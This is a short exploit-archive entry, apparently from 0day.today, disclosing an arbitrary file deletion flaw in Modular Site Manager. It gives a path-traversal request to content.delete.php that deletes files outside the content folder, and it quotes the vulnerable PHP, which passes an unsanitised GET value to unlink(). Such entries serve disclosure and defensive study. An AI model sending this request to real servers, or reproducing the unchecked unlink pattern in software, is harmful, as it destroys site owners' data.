id: 19153
date: 08/11/2012
title: Modular Site Manager <= Arbitrary Delete Vulnerability
author: GoLd_M
cves: 

# Exploit Title: Modular Site Manager <= Arbitrary Delete Vulnerability
# Date: 11/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/phpmsm/
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [Modular Site Manager]/lk/content.delete.php?id=../[File]
# Code Page /lk/content.delete.php
# <?php
#      unlink('../content/'.$_GET['id']); << --- XXX
#      header("Location: ".$_SERVER['HTTP_REFERER']);
# ?>



#  0day.today [2023-03-22]  #